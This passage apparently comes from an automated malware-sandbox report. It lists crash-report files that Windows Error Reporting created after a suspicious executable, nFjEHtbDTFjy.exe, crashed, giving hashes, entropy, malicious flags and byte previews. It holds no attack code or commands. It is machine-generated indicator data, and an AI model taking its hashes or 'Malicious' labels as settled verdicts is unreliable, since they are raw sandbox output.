                                                                                                                                                                                                          SHA-512:77C5330C4C69F155E0882138F1FB36226DCBB777D5FF284CCFC4326FDF62D0ED591396AD168FC2CD0979E9B40FFC472B558CA6921C22256789F7CC357877731F
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.2.5.9.1.8.7.4.3.2.9.7.4.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.2.5.9.1.8.8.4.7.9.8.6.9.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.b.5.b.5.3.4.5.-.b.e.d.f.-.4.3.f.7.-.a.5.c.3.-.3.5.e.3.2.c.e.8.b.4.4.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.8.1.b.e.e.f.-.a.6.f.1.-.4.4.c.8.-.8.b.4.5.-.b.e.3.1.e.e.4.d.8.e.5.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.F.j.E.H.t.b.D.T.F.j.y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.7.0.-.0.0.0.1.-.0.0.1.4.-.e.8.8.5.-.f.b.6.d.c.c.0.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.0.e.e.a.5.a.1.6.9.2.a.8.5.b.1.2.0.9.d.2.5.6.5.f.2.4.7.0.9.a.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.F.j.E.H.t.b.D.T.F.j.y...e.x.e.....T.a.r.g.e.
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9452739503815246
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:xRF2wluKeVGps5hJoI7JfoQXIDcQvc6QcEVcw3cE/n+HbHgnoW6He1Oy1QaSWAEy:3QKeMpK0BU/gjRJk1zuiF6Z24IO8cUE
                                                                                                                                                                                                          MD5:7806C5D62A48231A38E54741BF958DC4
                                                                                                                                                                                                          SHA1:D5B51A0C836E3E720D540900820E35782B17F199
                                                                                                                                                                                                          SHA-256:C90956262588F4B7D779364974D605C455E25D4EF84F8866BB084491E2C042E1
                                                                                                                                                                                                          SHA-512:EBDC0718DFF73F0ABA1F2918AB201253F373EABCF898379F20DDFDA865D33AF577B1CF14DA2C8759DE1633BC6F072A298B24E74A01480D8210BB53C0EE8B2235
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.2.5.9.1.8.6.3.1.2.9.7.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.2.5.9.1.8.7.9.0.6.7.2.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.0.0.6.4.9.2.5.-.9.d.8.e.-.4.1.5.2.-.9.a.4.4.-.1.7.c.6.4.1.a.5.e.9.e.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.c.c.3.7.a.c.-.4.7.6.2.-.4.8.8.2.-.8.c.c.7.-.7.8.1.a.1.a.f.d.7.4.5.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.F.j.E.H.t.b.D.T.F.j.y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.1.0.-.0.0.0.1.-.0.0.1.4.-.7.f.f.4.-.0.1.6.e.c.c.0.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.0.e.e.a.5.a.1.6.9.2.a.8.5.b.1.2.0.9.d.2.5.6.5.f.2.4.7.0.9.a.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.F.j.E.H.t.b.D.T.F.j.y...e.x.e.....T.a.r.g.e.
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9387274744870066
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:NV/GFDreVGys5hJoI7JfoQXIDcQvc6QcEVcw3cE/n+HbHgnoW6He1Oy1QaSWAEN4:mpreMyK0BU/gjRJkVzuiF6Z24IO8cUE
                                                                                                                                                                                                          MD5:6ACDEAF0CD98F0CBFD101C2370C116DF
                                                                                                                                                                                                          SHA1:CA5FEA390AC69590D16182A6EA5E130F4693DD6C
                                                                                                                                                                                                          SHA-256:9FD9F73A7AF3D5D54A7D98739F3DC9DA2AB39DCAAD1842501DCCE3505EA0FA76
                                                                                                                                                                                                          SHA-512:1EEB4136E971C3A3F3168BBA96CB4F451160A634EB621AB22E1B467FA76875951AC3A17A939D9766C88919695EFF4691C4F8B138631BDE0D5375960CEE5D351F
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.2.5.9.1.8.7.0.6.0.7.0.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.2.5.9.1.8.8.3.5.7.6.0.1.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.9.f.2.d.f.6.-.7.b.7.b.-.4.7.2.5.-.9.a.5.5.-.f.a.1.0.8.7.4.4.8.2.0.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.c.2.e.a.d.c.-.8.c.c.4.-.4.a.9.8.-.9.5.d.5.-.8.a.c.1.e.9.5.a.f.a.2.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.F.j.E.H.t.b.D.T.F.j.y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.e.8.-.0.0.0.1.-.0.0.1.4.-.9.a.3.b.-.f.f.6.d.c.c.0.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.0.e.e.a.5.a.1.6.9.2.a.8.5.b.1.2.0.9.d.2.5.6.5.f.2.4.7.0.9.a.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.5.3.6.b.7.5.3.2.4.0.0.b.a.f.2.7.b.e.b.2.b.f.d.4.2.5.1.5.9.2.6.4.a.d.7.1.1.3.6.!.n.F.j.E.H.t.b.D.T.F.j.y...e.x.e.....T.a.r.g.e.
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Sun Sep 8 08:53:06 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):95510
                                                                                                                                                                                                          Entropy (8bit):1.989561889631803
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:cYTcCS2IRzGAL7vda4aY2MH3v3KAgqoy7V3FrmBEcX:/ICbCzG67vda4/f31g8jmGc
                                                                                                                                                                                                          MD5:CD703D9370CD6EB57041DF2CE6E564F8
                                                                                                                                                                                                          SHA1:873678CC967F2A301292BCD627320E615079E4BC
                                                                                                                                                                                                          SHA-256:9A42BE2400EDDCB55055045FF8A28EB4B466E4F26D99F558F7B139504BF881D2
                                                                                                                                                                                                          SHA-512:B9085964FD49E01A67EB4FC790BB1C8FC6B4AB33076646B5E7FC6187BF303369C566D509D045E7ACDB1025E07749E869F8D1E6B90BCC8CDAFA0BB76391E64F49
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MDMP..a..... ........e.f....................................d...T?..........T.......8...........T............!...S......................................................................................................eJ......@.......GenuineIntel............T............e.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Sun Sep 8 08:53:06 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):96746
                                                                                                                                                                                                          Entropy (8bit):1.9929454035012792
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:907PcCStMwzbhFtaKavPlcPbls1NwMxxKrcmuDBAc52NVCSph:W7kC8Hzzt6vPlcyjwkxDVh2NPp
                                                                                                                                                                                                          MD5:4363F84E27751BD625B4BC114F18B695
                                                                                                                                                                                                          SHA1:96565993519B8045DA1099C8B0858C7962C81CD6
                                                                                                                                                                                                          SHA-256:2C7567DDE22D70A7F6374BF4107E40943A9532E0AAC0CCC5EA69CFFBD86489BA
                                                                                                                                                                                                          SHA-512:9D48DB52C9FF03B91966316C2D35693D9E2C04F8E8C6EC1F204FD162C4828C6BA0B0174A826C2437ED3D059D716E4C8FC577EB2DAAA636289F324E4D18D9039F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MDMP..a..... ........e.f....................................t...T?..........T.......8...........T............!...X......................................................................................................eJ......@.......GenuineIntel............T............e.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8362
                                                                                                                                                                                                          Entropy (8bit):3.70656602139426
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJlx6M6YcDPSUpPgmfWXprY89bvwsfhFm:R6lXJj6M6YYSUpPgmfWPvDfa
                                                                                                                                                                                                          MD5:375E2EA9BF1713FD389AB130C68A1F11
                                                                                                                                                                                                          SHA1:D95738500DF4FA6CCB68192B70FF63B502A72F65
                                                                                                                                                                                                          SHA-256:24C3C634D858F4FD8877698E095E4A55F9638439081F4DA26AE61FA089FB96C9
                                                                                                                                                                                                          SHA-512:8D3F869B3F81868EF0AC6872637510A1174A1BA1BE96EF3E249C8B1BCB5E33633255C5D5CB765F8106FF8A54E9CE2D58EBD64E53C64E5EB496F4313363DA0BDF
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.6.8.<./.P.i.
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8362
                                                                                                                                                                                                          Entropy (8bit):3.7055810339434005
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJYJ6I6YcDPLSUpPgmfWXprZ89bv+sf0wFm:R6lXJe6I6YUSUpPgmfWsv9fS
                                                                                                                                                                                                          MD5:0CA7326EE6B5A5DD9E8ACC0FE144D04A
                                                                                                                                                                                                          SHA1:6CFD938C2C95EDF39AA5F84ADFC8AD50AC6BDB5C
                                                                                                                                                                                                          SHA-256:A442D867DEEB23F67B89ED2DCA920C9225FC52C7ECD151B6DB64C534AF3E0273
                                                                                                                                                                                                          SHA-512:93FB4FFBD8E887B54AF3B4F80397535050688CA86C58C0B56567CDEEE5C3812548ADF696C758FBC19EDE9E2C2C6C5641C872AC47EF0F1170FD541FA696B75C19
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.2.8.<./.P.i.
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4629
                                                                                                                                                                                                          Entropy (8bit):4.509599020473798
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsQJg77aI90/WpW8VYUYm8M4JYLBFXW/+q8x7cVGZW8td:uIjfWI7Gu7VkJQr+IcVX8td
                                                                                                                                                                                                          MD5:EB8CA79ADA2139BAA586C0F004E17CB9
                                                                                                                                                                                                          SHA1:71F10E3F9154AC05ACE29244AE8484AF4883E641
                                                                                                                                                                                                          SHA-256:825EC8E604DBBF0EC5F1A2712794C9823B9CC6A1A594C609BB90FC9CE04E8346
                                                                                                                                                                                                          SHA-512:CFE6CB6E31F28389A5332EC77C8F580926CFAEE055F569DA67C1605D20FCFDB3844D24B057FE0B89162C3EB7D59151EDEC1229DCF98D7828C56EC10BA6C54555
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="491035" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4629
                                                                                                                                                                                                          Entropy (8bit):4.5096987113342335
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsQJg77aI90/WpW8VYtYm8M4JYLBF2+q8x71GZW8yd:uIjfWI7Gu7VNJQKI1X8yd
                                                                                                                                                                                                          MD5:A4682AB993BBB16CC70DE4F431FF3661
                                                                                                                                                                                                          SHA1:ECBAD0AE719083964E0B4024F7644FF79CF0D332
                                                                                                                                                                                                          SHA-256:31BE3BE1E326FD941477F159BB85C7CA5F265CAB8FFF7299410E96E2A2C825CE
                                                                                                                                                                                                          SHA-512:17D33100C597AEC0ADC6B6C4FD081CFF2CC256A988AF042E9926B452C6D06CFE1D47779F49567D14F338DAD867F8259DAA4466A7572EE5A6B0A3A4A5799F838B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="491035" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Sun Sep 8 08:53:07 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):71808
                                                                                                                                                                                                          Entropy (8bit):1.8670965048867207
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:bUNykY7JWxzaub8HxYVOSBS1PWpIlHFzG7DW:stYFYzrYHTSWW2sD
                                                                                                                                                                                                          MD5:1AB99792BC7B69162209B85BD5D5C604
                                                                                                                                                                                                          SHA1:E32CF53F413BBDA5FD59E9D755CF62AF387C527C
                                                                                                                                                                                                          SHA-256:0E4B95DEEBFBC70B6C5E81F133D30038F1F561313DA32E42315A66B9C8E7DCE3
                                                                                                                                                                                                          SHA-512:AEEAAA4FB6890DF28EEE5E0838D8C011AEC3F0A302C1AD215552157FB854EA1E9CE962AE2A7B9A59F7A0073C86B7047A02D59600DC242E60862D82479B610305
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MDMP..a..... ........e.f............$...............,............5..........T.......8...........T.......................................................................................................................eJ......D.......GenuineIntel............T............e.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Sun Sep 8 08:53:07 2024, 0x1205a4 type
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):94454
                                                                                                                                                                                                          Entropy (8bit):1.8508060952847785
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ZABVWVXOcXKAh2PSdOK8Zr71bMqx8ykW3aRw7k+qmuMhTCnSa8XkRj9MzJUA5gg:ifbAh2qQzZNbzayb3JqmuMl4QkRj9Lx
                                                                                                                                                                                                          MD5:4A5102555C5C453179DFA9BCF37CF51D
                                                                                                                                                                                                          SHA1:09A11E53698C6485760A551EE96F054E5FCC4772
                                                                                                                                                                                                          SHA-256:1668188809279AE9C9220362651370DB592D333E2DAC961B4BCD8052504CE062
                                                                                                                                                                                                          SHA-512:0442ADECB560F05CA2B3AD1AE64FB4786B5185C1DC3EF3EC50BCC04118AF12C1375AAE7F0F97B684F2946FBA17476AE894EB59C8A3F308CE62C878AEA2E1DA38
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:MDMP..a..... ........e.f.........................................>..........T.......8...........T...........X!...O..........P...........<...............................................................................eJ..............GenuineIntel............T.......p....e.f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8362
                                                                                                                                                                                                          Entropy (8bit):3.70752355273682
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJJj6TVl6YcDbSUDsgmfWXprz89b4bOsfI+jm:R6lXJN6j6Y8SUDsgmfWO4bNf16
                                                                                                                                                                                                          MD5:F6C4D3113BE6EBDA589DBCCD1AFD7738
                                                                                                                                                                                                          SHA1:5FD245E712C15ABE3F69B443E4972426F65EAA84
                                                                                                                                                                                                          SHA-256:1024E90ABEB0561B4F5EC296886C53641BBCB37BD870E36C4C4E6F4C64A581AA
                                                                                                                                                                                                          SHA-512:BF0A3453BE447CE0F3EBC32C4499604401127377BC76AEED086FF3B03A7CB1D8C71187A11094BE59D0BB14D11210F3676673FD16087CFFA8E42693B32FFA7081
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.8.1.6.<./.P.i.
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4629
                                                                                                                                                                                                          Entropy (8bit):4.508864543441499
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:cvIwWl8zsQJg77aI90/WpW8VYlYm8M4JYLBFus+q8x7YBGZW88d:uIjfWI7Gu7VlJQ7IYBX88d
                                                                                                                                                                                                          MD5:98C138186D911D7B092B5BACEA5F9C0B
                                                                                                                                                                                                          SHA1:4BCF435DC4A688081461C33F8D206F219673BA4B
                                                                                                                                                                                                          SHA-256:EA6F9DEE6B71035DB82C29FEF7EEA009027ED6674E37E43DD73CA057C2B7612B
                                                                                                                                                                                                          SHA-512:EE39E9093A8EAD99784F4B0C3006AE4C7F913CAE702CF22BB343DBB68D6C4638776783133DF38BF6F2159758F5C7740C6AB30ABEB65EECBECCC596EC7B3B88DC
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="491035" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8362
                                                                                                                                                                                                          Entropy (8bit):3.7058994674702217
